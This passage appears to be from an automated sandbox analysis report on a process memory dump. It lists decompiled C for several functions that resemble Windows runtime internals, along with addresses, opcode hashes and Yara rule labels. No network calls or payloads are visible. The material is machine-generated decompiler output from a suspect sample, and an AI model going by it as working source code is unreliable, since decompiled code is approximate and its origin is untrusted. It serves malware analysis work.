						E00F1CC50(E00F14510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E00F37D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E00FE8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E00F32280(_t58, _v44);
						E00F3DD82(_v44, _t102, _t98);
						E00F3B944(_t102, _v5);
						return E00F2FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1008628; // 0x0
							_v28 = _t67;
							_t68 =  *0x100862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1008628; // 0x0
						_t105 = _v28;
						_t80 =  *0x100862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0xfdfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x00f3dbe9
0x00f3dbf2
0x00f3dbf7
0x00f3dbf9
0x00f3dbfc
0x00f3dc00
0x00f3dc03
0x00f3dc14
0x00f3dd54
0x00f3dd54
0x00f3dd54
0x00f3dc18
0x00f3dc1d
0x00f3dc1d
0x00f3dc32
0x00f3dc3b
0x00f3dc3e
0x00f3dc46
0x00f3dd5b
0x00f3dd62
0x00f3dd64
0x00f3dd67
0x00f3dd69
0x00f3dd6b
0x00f3dd6e
0x00f3dd70
0x00f3dd73
0x00f3dd73
0x00000000
0x00f3dc4c
0x00f3dc4e
0x00f83ae3
0x00f83ae8
0x00f83aea
0x00f3dce7
0x00f3dce9
0x00f3dcec
0x00f3dcee
0x00f3dcf0
0x00f3dcf3
0x00f3dcf5
0x00f83af2
0x00f83af5
0x00f83af5
0x00f3dd06
0x00f3dd08
0x00f3dd0b
0x00f3dd12
0x00f83b08
0x00f3dd18
0x00f3dd18
0x00f3dd18
0x00f3dd20
0x00f3dd23
0x00f83b16
0x00f83b16
0x00f3dd29
0x00f3dd2d
0x00f3dd36
0x00f3dd40
0x00f3dd51
0x00f3dd51
0x00f3dc54
0x00f3dc59
0x00f3dc59
0x00f3dc5e
0x00f3dc5e
0x00f3dc63
0x00f3dc66
0x00f3dc6b
0x00f3dc78
0x00f3dc7b
0x00f3dc81
0x00f3dc81
0x00f3dc83
0x00f3dc89
0x00000000
0x00000000
0x00f3dd7b
0x00f3dd7b
0x00f3dc8f
0x00f3dc8f
0x00f3dc92
0x00f3dc99
0x00f3dc9f
0x00f3dca5
0x00f3dcaa
0x00f3dcaa
0x00f3dcb3
0x00f3dcb8
0x00f3dcbb
0x00f3dcc1
0x00f3dccf
0x00f3dcd2
0x00f3dcd5
0x00f3dcd7
0x00f3dcda
0x00f3dcdc
0x00f3dcdc
0x00f3dce2
0x00f3dce4
0x00000000
0x00f3dce4

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42b294313cf7d6b1d280c5d3213186f39f16be880052e6334b5b23818e822c1
Instruction ID: f357d64db0221104c0dada1f6265d0a0677b11c0d9ba3570373bd057f6fc5592
Opcode Fuzzy Hash: d42b294313cf7d6b1d280c5d3213186f39f16be880052e6334b5b23818e822c1
Instruction Fuzzy Hash: C451BEB1E00609CFCB14DFA8D880AAEFBF5BF48360F21815AD995A7344DB35AD44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FE740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00FE740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E00F6D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E00F5F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L00F34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L00F34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E00F5F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L00F34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x00fe740d
0x00fe740d
0x00fe7412
0x00fe7413
0x00fe7416
0x00fe7418
0x00fe741c
0x00fe741f
0x00fe7422
0x00fe7422
0x00fe7428
0x00fe742a
0x00fe742a
0x00fe7451
0x00fe7432
0x00fe744f
0x00fe744f
0x00000000
0x00fe7434
0x00fe7438
0x00fe7443
0x00fe7517
0x00fe7517
0x00fe751a
0x00fe7535
0x00fe7520
0x00fe7527
0x00fe752c
0x00fe7531
0x00fe7533
0x00000000
0x00fe7533
0x00000000
0x00fe7531
0x00fe754b
0x00fe754f
0x00fe755c
0x00fe755c
0x00fe755f
0x00fe7560
0x00fe7561
0x00fe7562
0x00fe7563
0x00fe7568
0x00fe756a
0x00fe756c
0x00fe756d
0x00fe756d
0x00fe756f
0x00fe7572
0x00fe7574
0x00fe7577
0x00fe757c
0x00fe757f
0x00000000
0x00fe7551
0x00fe7551
0x00fe7551
0x00fe7553
0x00fe7553
0x00fe7449
0x00fe7449
0x00fe744c
0x00fe744c
0x00000000
0x00fe744c
0x00fe7443
0x00fe750e
0x00fe7514
0x00fe7514
0x00fe7455
0x00fe7469
0x00fe746d
0x00000000
0x00fe7473
0x00fe7473
0x00fe7476
0x00fe7480
0x00fe7484
0x00fe748e
0x00fe7493
0x00fe7493
0x00fe7496
0x00fe7499
0x00fe74a1
0x00fe74b1
0x00fe74b5
0x00000000
0x00fe74bb
0x00fe74c1
0x00fe74c1
0x00fe74c4
0x00fe74c5
0x00fe74c6
0x00fe74c7
0x00fe74c8
0x00fe74cd
0x00000000
0x00fe74d3
0x00fe74d3
0x00fe74d6
0x00fe74d8
0x00fe74db
0x00fe74dd
0x00fe74e0
0x00fe74e7
0x00fe74ee
0x00fe74ee
0x00fe74f4
0x00fe74f9
0x00000000
0x00fe74fb
0x00fe74fb
0x00fe74fd
0x00fe7500
0x00fe7503
0x00fe7505
0x00fe7505
0x00fe74f9
0x00000000
0x00fe74cd
0x00fe74b5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: e9382f962d6118a7c9eaf8ce229dd29d7d9607a4f22adc04241c16173f8c6d3c
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: F851AA71A00746EFCB15DF15C881A92BBB5FF45314F18C0BAE9089F212E371E946DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F42990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00F42990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0xfeff00);
				E00F6D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xef1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E00F5E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xef1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E00F951BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xef166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E00F42AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E00F26600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E00F42C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E00F2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E00F42AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E00F42C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E00F42ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E00F6D0D1(_t62);
				goto L28;
			}

0x00f42990
0x00f42992
0x00f42997
0x00f429a3
0x00f429a6
0x00f429ab
0x00f429ad
0x00f429b2
0x00f85c80
0x00f429b8
0x00f429b8
0x00f429bb
0x00f429c0
0x00f429c5
0x00f429c6
0x00f429c6
0x00f429cb
0x00000000
0x00000000
0x00f429cd
0x00f429d0
0x00f429d9
0x00f429db
0x00f429dd
0x00f42a7f
0x00f42a84
0x00f42a87
0x00f42a89
0x00f85ca1
0x00f85ca3
0x00000000
0x00f42a8f
0x00f42a8f
0x00000000
0x00f42a8f
0x00000000
0x00f429e3
0x00f429e3
0x00f429e3
0x00000000
0x00f429e3
0x00f429dd
0x00000000
0x00f429db
0x00f429e6
0x00f429e9
0x00f429eb
0x00f429ed
0x00f429f3
0x00f429f5
0x00f429f8
0x00f429fa
0x00f42a97
0x00f42a9a
0x00f42a9d
0x00f42add
0x00000000
0x00f42a9f
0x00f42aa2
0x00f42aa5
0x00f42aa8
0x00f42aab
0x00f85cab
0x00f85caf
0x00f85cc5
0x00f85cda
0x00f85cdc
0x00f85cdf
0x00f85ce5
0x00000000
0x00f85ceb
0x00f85ced
0x00f85cee
0x00000000
0x00f85cee
0x00f85cb1
0x00f85cb4
0x00f85cb9
0x00f85cbb
0x00000000
0x00f85cbd
0x00f85cbd
0x00000000
0x00f85cbd
0x00f85cbb
0x00f42ab1
0x00f42ab1
0x00f42ac4
0x00f42ac6
0x00f42ac6
0x00000000
0x00f42ac6
0x00f42aab
0x00000000
0x00f42a00
0x00f42a09
0x00f42a0e
0x00f42a21
0x00f42a24
0x00f42a35
0x00f42a3a
0x00f42a3d
0x00f42a42
0x00f42a59
0x00f42a59
0x00f42a5c
0x00f42a5f
0x00f42a5f
0x00f429fa
0x00f429f3
0x00f42a64
0x00f42a64
0x00f42a6b
0x00f42a6b
0x00f42a6d
0x00f42a72
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ad8327eb85f8915b47354a3ea84477600ca731e016637ce2918e8990ab097ca
Instruction ID: 0e0b9fbcd058548772263d4b1b93ddf46744a48ff0b28a2120c87eb276708151
Opcode Fuzzy Hash: 6ad8327eb85f8915b47354a3ea84477600ca731e016637ce2918e8990ab097ca
Instruction Fuzzy Hash: E6513372A002199FCF65DF95C880ADEBBB5BB48720F558065FC14AB261C3399D92EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F44D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00F44D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x100d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E00F5FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1007bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E00F5B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L00F34620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E00F1CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E00F5B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E00F5F380(_t67 + 0xc, 0xef5138, 0x10) == 0) {
								 *0x10060d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E00F44F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E00F44E70(0x10086b0, 0xf45690, 0, 0) != 0) {
					_t46 = E00F1CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x00f44d3b
0x00f44d4d
0x00f44d53
0x00f44d58
0x00f44d65
0x00f44d6c
0x00f44d71
0x00f44d77
0x00f44d7f
0x00f44d8c
0x00f44d8e
0x00f44dad
0x00f44db0
0x00f44db7
0x00f44db8
0x00f44db9
0x00f44dba
0x00f44dbb
0x00f44dc1
0x00f44dc8
0x00f44dcc
0x00f44dd5
0x00f44dde
0x00f44ddf
0x00f44de0
0x00f44de1
0x00f44de6
0x00f44de7
0x00f44de9
0x00f44df3
0x00000000
0x00000000
0x00f86c7c
0x00f86c8a
0x00f86c8a
0x00f86c9d
0x00f86ca7
0x00f86cac
0x00f86cb2
0x00f86cb9
0x00000000
0x00f86cbf
0x00f86cbf
0x00000000
0x00f86cbf
0x00f86cb9
0x00f44dfb
0x00f86ccf
0x00f86cd3
0x00f44e32
0x00f44e39
0x00f86ce0
0x00f86cf2
0x00f86cf2
0x00f86ce0
0x00f44e3f
0x00f44e41
0x00f44e51
0x00f44e51
0x00f44e03
0x00f44e03
0x00f44e09
0x00f44e0f
0x00f44e57
0x00000000
0x00000000
0x00f44e1b
0x00f44e30
0x00f44e5b
0x00f44e5b
0x00000000
0x00f44e30
0x00f44e11
0x00f44e11
0x00f44e16
0x00000000
0x00f44e16
0x00f44e01
0x00000000
0x00f44e01
0x00f44da5
0x00f86c6b
0x00000000
0x00f44dab
0x00f44dab
0x00000000
0x00f44dab

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b232558a523029aa10a49637963064018897e48c30ac8a53abcb88eb1977b6
Instruction ID: 41399f129f5b944dbe635d5e90913736807b869e80d446c88d427692caecf585
Opcode Fuzzy Hash: 76b232558a523029aa10a49637963064018897e48c30ac8a53abcb88eb1977b6
Instruction Fuzzy Hash: 0F41B371A407189FEB31DF14CC81FAABBA9FB45720F004099ED45A7281D775ED44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F44BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00F44BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x100d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E00F1CC50(_t86);
					L11:
					return E00F5B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1008504
				E00F32280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E00F5FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E00F5B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L00F34620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E00F1CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1008504
								E00F2FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E00F44F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x00f44bad
0x00f44bbf
0x00f44bc2
0x00f44bc6
0x00f44bcd
0x00f44bd9
0x00f867fe
0x00f86800
0x00f44ccc
0x00f44ccd
0x00f44cb7
0x00f44cc9
0x00f44cc9
0x00f44bdf
0x00f44be5
0x00000000
0x00000000
0x00f44beb
0x00f44bef
0x00000000
0x00000000
0x00f44bf5
0x00f44bf9
0x00f44c06
0x00f44c0b
0x00f44c17
0x00f44c1c
0x00f44c1f
0x00f44c25
0x00f44c33
0x00f44c3d
0x00f44c40
0x00f44c43
0x00f44c47
0x00f44c4d
0x00f44c53
0x00f44c54
0x00f44c55
0x00f44c56
0x00f44c5b
0x00f44c5c
0x00f44c63
0x00f44c6b
0x00000000
0x00000000
0x00f86776
0x00f86784
0x00f86784
0x00f8679f
0x00f867a7
0x00f867af
0x00f867ce
0x00000000
0x00f867b1
0x00f867b7
0x00f867b8
0x00f867c1
0x00f867d3
0x00f867d9
0x00f867dd
0x00f44c94
0x00f44c94
0x00f44c98
0x00f44c9c
0x00f44ca3
0x00f867f4
0x00f867f4
0x00f44cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x00f44cb5
0x00f44c79
0x00f44c7e
0x00f44c89
0x00f44c8b
0x00f44c8f
0x00f44c8f
0x00000000
0x00f44c89
0x00f867c3
0x00000000
0x00f867c3
0x00f867af
0x00f44c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b99db5b1df3277c294636a9d0392d6d94f6bd7328a7b1dbfd59674539c7b34da
Instruction ID: be46b3628a560c7ad5ddaea5588bcf6029533382946041b156eebdb4d296d23f
Opcode Fuzzy Hash: b99db5b1df3277c294636a9d0392d6d94f6bd7328a7b1dbfd59674539c7b34da
Instruction Fuzzy Hash: 1541A535E412289BCB21EF64CD81BEE77B4AF45710F0500A5E908EB241DB78EE84DBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00F28A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00F28A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
